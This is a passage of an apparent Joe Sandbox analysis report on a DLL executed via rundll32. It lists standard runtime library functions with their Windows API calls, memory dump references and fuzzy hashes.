              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              • Opcode ID: 10c542446898b9a6bdaaa6ba17a22b964db1244e8d4012b1d28f721d036ded23
              • Instruction ID: c18c8f6020315f2227e7e9ca34105a8632121bdb5879fd430c268b6e934a0dae
              • Opcode Fuzzy Hash: 10c542446898b9a6bdaaa6ba17a22b964db1244e8d4012b1d28f721d036ded23
              • Instruction Fuzzy Hash: 77B147718A021DEFCF04DFA4D98099EBFB5FF0A318B24456AE8146F251D731EA51CB92
              Function 6FE7068D Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              • Opcode ID: e2c9c62fa06004c37898c9b8795d2eb2bbea6d423a12934031eb211a417338a5
              • Instruction ID: 9e0d8ea497bfda6da8af3651949c5120052943907b34f2addb1ad17b0e8fd2a0
              • Opcode Fuzzy Hash: e2c9c62fa06004c37898c9b8795d2eb2bbea6d423a12934031eb211a417338a5
              • Instruction Fuzzy Hash: AAB14772A053559FEB21CE68CC80B9EBFB5EF45314F345156EA04AF381DB76A901CBA0
              Function 6FE66540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
              Download Yara Rule
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 6FE66577
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6FE6657F
              • _ValidateLocalCookies.LIBCMT ref: 6FE66608
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6FE66633
              • _ValidateLocalCookies.LIBCMT ref: 6FE66688
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 1170836740-1018135373
              • Opcode ID: e098d756e2f5ddd9eb8da4c1c77905275fde669f837576d5aa188cd2f8b6f5a0
              • Instruction ID: 39cf7d4aacf672f03ca29550361e8928ec70402ff3be3ef5971f7162ca86afa8
              • Opcode Fuzzy Hash: e098d756e2f5ddd9eb8da4c1c77905275fde669f837576d5aa188cd2f8b6f5a0
              • Instruction Fuzzy Hash: 8341953496021D9BCF10CF68C884A9EBFB5AF4632CF20855AD825AF395DB35E915CF90
              Function 6FE71703 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,6FE6C75A,?,3089EAF1,?,6FE71812,6FE67D84,B586E81C,00000000,6FE6C75A), ref: 6FE717C4
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: 0768882d75ce2917d7f98efc42d6edd55037f89aee0d851fb867a8574af3f501
              • Instruction ID: 2a08f18951e658bc7dd13d69114c1f1f071d241a2590298e59b1e7ce3efc50af
              • Opcode Fuzzy Hash: 0768882d75ce2917d7f98efc42d6edd55037f89aee0d851fb867a8574af3f501
              • Instruction Fuzzy Hash: 6621D875A42720A7DB319AA4CC90A8A3FAAAF43774B300210F915A73C1DF34F911C7D0
              Function 6FE6FE17 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1debd9a40a4206996f76b716b0eda5faace0664e90c4acec4e3ae1c2af055e0f
              • Instruction ID: 4f6427aec61fed550e73b2eca1e1aa8ca77eeac68f6eddaf799bdd7456a24ac5
              • Opcode Fuzzy Hash: 1debd9a40a4206996f76b716b0eda5faace0664e90c4acec4e3ae1c2af055e0f
              • Instruction Fuzzy Hash: 3AB11B70A043499FDB21CFA9C840BAE7FB2AF46328F305159E62497381DB76A942CB50
              Function 6FE667A3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,6FE66721,6FE651C4,6FE64B74), ref: 6FE667B1
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FE667BF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6FE667D8
              • SetLastError.KERNEL32(00000000,?,6FE66721,6FE651C4,6FE64B74), ref: 6FE6682A
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 9c8f9b3520aa5c5b6fe9ea5c772bbff2e5527cf4e38c6ae2e578f57769218289
              • Instruction ID: 5a5d03d31a2be58154d085be8b7c1425da31414cf02e1cd9c39d932f8395db20
              • Opcode Fuzzy Hash: 9c8f9b3520aa5c5b6fe9ea5c772bbff2e5527cf4e38c6ae2e578f57769218289
              • Instruction Fuzzy Hash: 5C01FC321AEB2A5EAA2026749C946462F97EF4377CB31033DF5315D2E0EF116C119389
              Function 6FE73DF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
              Download Yara Rule
              Strings
              • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6FE73E14
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID: C:\Windows\SysWOW64\rundll32.exe
              • API String ID: 0-2837366778
              • Opcode ID: a4b4bbd94e72efd75a4ca4ca81ce749a2e312d38eb9ec1c82770061e8231af71
              • Instruction ID: f2d9e80c58a95b9d7a9ebbdc0eaf6532b13803c0a03ab3ea60941918871db87c
              • Opcode Fuzzy Hash: a4b4bbd94e72efd75a4ca4ca81ce749a2e312d38eb9ec1c82770061e8231af71
              • Instruction Fuzzy Hash: 98217971604315AFDBB1DF658C41C5BBFAAEF01368720451AEA149B290EF31E811C7A0
              Function 6FE6E429 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3089EAF1,6FE6C75A,?,00000000,6FE7C710,000000FF,?,6FE6E3C3,B586E81C,?,6FE6E397,?), ref: 6FE6E45E
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6FE6E470
              • FreeLibrary.KERNEL32(00000000,?,00000000,6FE7C710,000000FF,?,6FE6E3C3,B586E81C,?,6FE6E397,?), ref: 6FE6E492
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 71a65aff50bc780f03e3cea869ffe38f1c760e07fa6fc124007ca48be7f844cd
              • Instruction ID: d37d5ce9d84f601dbf169e3a1bb74cefa8d48649441aa193af90fc83398fbfdb
              • Opcode Fuzzy Hash: 71a65aff50bc780f03e3cea869ffe38f1c760e07fa6fc124007ca48be7f844cd
              • Instruction Fuzzy Hash: A5016735544D29ABDB219B54CC04FEE7FBBFB06725F104525E825A2280DB75A900CB94
              Function 6FE78CF4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
              Download Yara Rule
              APIs
              • __alloca_probe_16.LIBCMT ref: 6FE78D79
              • __alloca_probe_16.LIBCMT ref: 6FE78E42
              • __freea.LIBCMT ref: 6FE78EA9
                • Part of subcall function 6FE7047E: RtlAllocateHeap.NTDLL(00000000,6FE74371,7D32887D), ref: 6FE704B0
              • __freea.LIBCMT ref: 6FE78EBC
              • __freea.LIBCMT ref: 6FE78EC9
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocateHeap
              • String ID:
              • API String ID: 1423051803-0
              • Opcode ID: 08e228ac781b909063806dba62a836825682479f84b1dec11d4baad1d239df35
              • Instruction ID: 25f0bacd5788ee709ebdba41e4ff90108dc464676f3479f26288bd73123b6421
              • Opcode Fuzzy Hash: 08e228ac781b909063806dba62a836825682479f84b1dec11d4baad1d239df35
              • Instruction Fuzzy Hash: A5519572904206ABEB354E65CD40DAB3EADEFA5718B31052EFD1496250EF30EE51C760
              Function 6FE678B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6FE67863,?,?,00000001,?,?,?,6FE67952,00000001,FlsFree,6FE7DCE0,FlsFree), ref: 6FE678BF
              • GetLastError.KERNEL32(?,6FE67863,?,?,00000001,?,?,?,6FE67952,00000001,FlsFree,6FE7DCE0,FlsFree,?,?,6FE66878), ref: 6FE678C9
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6FE678F1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              • Opcode ID: dd154539d9d41bddcf9e1eba0681e41ac35fe033226c42508dd0cd449e4217d3
              • Instruction ID: 0bda078e3f2cc561ba59d66806d2a50a0fac63e3844f1eaad02587ecaae56098
              • Opcode Fuzzy Hash: dd154539d9d41bddcf9e1eba0681e41ac35fe033226c42508dd0cd449e4217d3
              • Instruction Fuzzy Hash: D1E01A34284719B6EF201E60DC05B893FA7AF02B94F305020F90DE81D1EFA5F862D784
              Function 6FE725E6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetConsoleOutputCP.KERNEL32(3089EAF1,00000000,00000000,?), ref: 6FE72649
                • Part of subcall function 6FE74945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FE78E9F,?,00000000,-00000008), ref: 6FE749A6
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6FE7289B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6FE728E1
              • GetLastError.KERNEL32 ref: 6FE72984
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 42727fe5137d33d4b791fa9c3a74bea1b320906961debd27443001f593bf2eb0
              • Instruction ID: 8095a45bf02032291c2fc078ce36a7b7a7eeef26584e96ff68e491671cc40122
              • Opcode Fuzzy Hash: 42727fe5137d33d4b791fa9c3a74bea1b320906961debd27443001f593bf2eb0
              • Instruction Fuzzy Hash: 1FD15975D042599FCB25CFA8C880AEDBFB5FF0A314F28416AE465EB351DA30A942CF50
              Function 6FE66883 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: AdjustPointer
              • String ID:
              • API String ID: 1740715915-0
              • Opcode ID: 17d42bb6074d86fbf526fa6d9c05a3f59c1f6b77f8463c6c9aa335c3045b296a
              • Instruction ID: 88696174092024631593abea885fabb79b44483a111c3ccab81d58719f85344d
              • Opcode Fuzzy Hash: 17d42bb6074d86fbf526fa6d9c05a3f59c1f6b77f8463c6c9aa335c3045b296a
              • Instruction Fuzzy Hash: AE51AD726A470A9FDB148F65C980BAA7BB5FF46318F30452EDC154F2A0EB31E881C790
              Function 6FE73694 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 6FE74945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FE78E9F,?,00000000,-00000008), ref: 6FE749A6
              • GetLastError.KERNEL32 ref: 6FE736F8
              • __dosmaperr.LIBCMT ref: 6FE736FF
              • GetLastError.KERNEL32(?,?,?,?), ref: 6FE73739
              • __dosmaperr.LIBCMT ref: 6FE73740
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: e48c6aecbc81831f4f23525f05d955914fe2954508d7426dba011c17d14bf390
              • Instruction ID: 18126f119859b3689ac006473de7fbd494d020bcee3466f856d29abaedc52ba2
              • Opcode Fuzzy Hash: e48c6aecbc81831f4f23525f05d955914fe2954508d7426dba011c17d14bf390
              • Instruction Fuzzy Hash: F221AFB1604315AF97709FB5C88185BBFA9EF013687208619EA2997780EF31F801CBA0
              Function 6FE749E8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
              Download Yara Rule
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6FE749F0
                • Part of subcall function 6FE74945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6FE78E9F,?,00000000,-00000008), ref: 6FE749A6
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FE74A28
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6FE74A48
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: 79f797e3f48ac68c8c774c1e9c8c518e9eea323c0ed85f2c3912f26fb8746c72
              • Instruction ID: 1e5edcb741399a357b0d3046297168e57840fee633daf84ab34bedbe8f8490cf
              • Opcode Fuzzy Hash: 79f797e3f48ac68c8c774c1e9c8c518e9eea323c0ed85f2c3912f26fb8746c72
              • Instruction Fuzzy Hash: 8411C8B6505615BF6B3297B64D88C6F6DAEEE862BC730111AF600D1240FF71DD02C275
              Function 6FE79F4D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • WriteConsoleW.KERNEL32(00000000,00000000,6FE6D16B,00000000,00000000,?,6FE785E1,00000000,00000001,?,?,?,6FE729D8,?,00000000,00000000), ref: 6FE79F64
              • GetLastError.KERNEL32(?,6FE785E1,00000000,00000001,?,?,?,6FE729D8,?,00000000,00000000,?,?,?,6FE72FB2,00000000), ref: 6FE79F70
                • Part of subcall function 6FE79F36: CloseHandle.KERNEL32(FFFFFFFE,6FE79F80,?,6FE785E1,00000000,00000001,?,?,?,6FE729D8,?,00000000,00000000,?,?), ref: 6FE79F46
              • ___initconout.LIBCMT ref: 6FE79F80
                • Part of subcall function 6FE79EF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6FE79F27,6FE785CE,?,?,6FE729D8,?,00000000,00000000,?), ref: 6FE79F0B
              • WriteConsoleW.KERNEL32(00000000,00000000,6FE6D16B,00000000,?,6FE785E1,00000000,00000001,?,?,?,6FE729D8,?,00000000,00000000,?), ref: 6FE79F95
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: b9348e2fb66b2324a2e7bb25f924b451862a3191288d1bbc9c0013db23883e82
              • Instruction ID: d6beec268ffccc74b978b40520719111d467624fe08f9e9305cf44f2af797d58
              • Opcode Fuzzy Hash: b9348e2fb66b2324a2e7bb25f924b451862a3191288d1bbc9c0013db23883e82
              • Instruction Fuzzy Hash: 25F0F83A010568BBCF325F918C0899E3FA7EF0B2B1F204020FA2995260CB329820DB91
              Function 6FE6C7EE Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: __aulldiv
              • String ID: +$-
              • API String ID: 3732870572-2137968064
              • Opcode ID: f256cc07467344d5823d9b5aafbfa4d5866cd55d923b229930bfc182ace8684e
              • Instruction ID: f4edd4e97d74ccc7eb633de8315e275a71fd755bb8fd6d6089ec5fc460839796
              • Opcode Fuzzy Hash: f256cc07467344d5823d9b5aafbfa4d5866cd55d923b229930bfc182ace8684e
              • Instruction Fuzzy Hash: B2A1B331BC525C9EDF14CE7C88507EE7FB1AF4632AF24865AE8A59B390C234E5028B50
              Function 6FE66E7F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlEncodePointer.NTDLL(00000000), ref: 6FE66EA4
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: 689a9a75effa35e7ebc78dd6a1819dd5e6257b259dbedd62bb5d7f85eaee53f4
              • Instruction ID: 108e73fd3cc4478ba8b72a9e6cc868fef34466f5bcc076806b1a731f36138a0b
              • Opcode Fuzzy Hash: 689a9a75effa35e7ebc78dd6a1819dd5e6257b259dbedd62bb5d7f85eaee53f4
              • Instruction Fuzzy Hash: 2B41287195020DEFDF05CF94CC80AEE7FB6BF49308F2481A9F914AA251D335A951DB51